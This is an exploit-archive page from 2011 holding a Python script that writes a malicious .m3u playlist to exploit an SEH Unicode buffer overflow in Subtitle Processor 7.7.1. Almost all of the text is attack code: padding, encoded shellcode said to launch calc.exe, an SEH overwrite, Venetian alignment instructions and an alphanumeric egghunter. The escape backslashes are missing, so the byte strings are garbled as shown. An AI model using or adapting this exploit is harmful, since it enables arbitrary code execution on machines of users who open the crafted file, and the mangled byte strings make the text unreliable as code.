Home / exploits Subtitle Processor 7.7.1 SEH Unicode Buffer Overflow
Posted on 28 April 2011
#!/usr/bin/python # I wanted to first of all thank all the people who took the time to help me. # Peter Van Eeckhoutte AKA corelanc0d3r. Awesome tutorials and thanks for putting up with me! # Jason Kratzer. Thanks a lot for helping me finish this exploit and showing me techniques! # Subtitle Processor 7.7.1 SEH Unicode Buffer Overflow # Download: http://sourceforge.net/projects/subtitleproc/ # Version 7.7.1 # Author: Brandon Murphy # Tested on Windows XP Pro SP3 # Author notified of vulnerability by email 12/11/2010 # No reply from author: Released exploit to public 4/26/2011 print "#=========================================================#" print "# Subtitle Processor 7.7.1 SEH Unicode Buffer Overflow #" print "# Vulnerability found & exploit written by Brandon Murphy #" print "# Fallow: @MK1234Tfan #" print "#=========================================================#" junk = "x41" * 70 tag = "s1cks1ck" # msfpayload windows/exec CMD=calc.exe 496 shellcode = ("x89xe5xddxc2xd9x75xf4x5fx57x59x49x49x49x49x43" "x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34" "x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41" "x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58" "x50x38x41x43x4ax4ax49x4bx4cx4dx38x4dx59x43x30" "x45x50x45x50x45x30x4bx39x5ax45x50x31x58x52x43" "x54x4cx4bx50x52x56x50x4cx4bx56x32x54x4cx4cx4b" "x51x42x52x34x4cx4bx54x32x56x48x54x4fx4ex57x51" "x5ax56x46x56x51x4bx4fx56x51x49x50x4ex4cx47x4c" "x43x51x43x4cx45x52x56x4cx51x30x49x51x58x4fx54" "x4dx43x31x58x47x4bx52x5ax50x56x32x50x57x4cx4b" "x56x32x52x30x4cx4bx51x52x47x4cx45x51x58x50x4c" "x4bx47x30x43x48x4cx45x4fx30x43x44x51x5ax43x31" "x58x50x50x50x4cx4bx51x58x45x48x4cx4bx56x38x47" "x50x45x51x49x43x4bx53x47x4cx51x59x4cx4bx50x34" "x4cx4bx45x51x49x46x56x51x4bx4fx50x31x49x50x4e" "x4cx4fx31x58x4fx54x4dx45x51x49x57x50x38x4bx50" "x54x35x4cx34x45x53x43x4dx4cx38x47x4bx43x4dx56" "x44x54x35x5ax42x51x48x4cx4bx50x58x51x34x45x51" "x58x53x45x36x4cx4bx54x4cx50x4bx4cx4bx51x48x45" "x4cx43x31x58x53x4cx4bx54x44x4cx4bx45x51x4ex30" "x4bx39x51x54x47x54x51x34x51x4bx51x4bx43x51x50" "x59x50x5ax50x51x4bx4fx4bx50x51x48x51x4fx51x4a" "x4cx4bx54x52x5ax4bx4bx36x51x4dx52x4ax43x31x4c" "x4dx4dx55x4fx49x43x30x45x50x43x30x50x50x43x58" "x50x31x4cx4bx52x4fx4bx37x4bx4fx4ex35x4fx4bx5a" "x50x4ex55x4fx52x50x56x43x58x49x36x4cx55x4fx4d" "x4dx4dx4bx4fx58x55x47x4cx43x36x43x4cx54x4ax4d" "x50x4bx4bx4bx50x43x45x54x45x4fx4bx50x47x54x53" "x54x32x52x4fx43x5ax43x30x51x43x4bx4fx49x45x52" "x43x43x51x52x4cx45x33x56x4ex52x45x52x58x45x35" "x43x30x41x41") junk2 = "x41" * 3531 nseh = "x61x62" # ppr 005700b4 Subtitleprocessor.exe seh = "xb4x57" # Venetian # Align: # add byte ptr [esi],ch - x6e # pop ebp - x55 # add byte ptr [esi],ch - x6e # pop eax - x58 # add byte ptr [esi],ch - x6e # add eax,0x11001400 - x05x14x11 # add byte ptr [esi],ch - x6e # sub eax,0x11001300 - x2dx13x11 # add byte ptr [esi],ch - x6e # # Jump: # push eax - x50 # add byte ptr [esi],ch - x6e # ret - xc3 align = "x6ex55x6ex58x6ex05x14x11x6ex2dx13x11x6e" jmp = "x50x6exc3" junk3 = "x44" * 108 egghunter = ("PPYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58A" "APAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB1V3Q7ZKOLO0B0R1ZKR0X8MNNOLKU0Z2TJO6X2S011S2K4KJZ6O2U9Z6O2U9WKO9WKPA") payload = junk + tag + shellcode + junk2 + nseh + seh + align + jmp + junk3 + egghunter try: make = open("exploit.m3u",'w') make.write(payload) make.close() print "[+] Go Go Gadget SEH unicode!" except: print "[-] Something went wrong...</3"
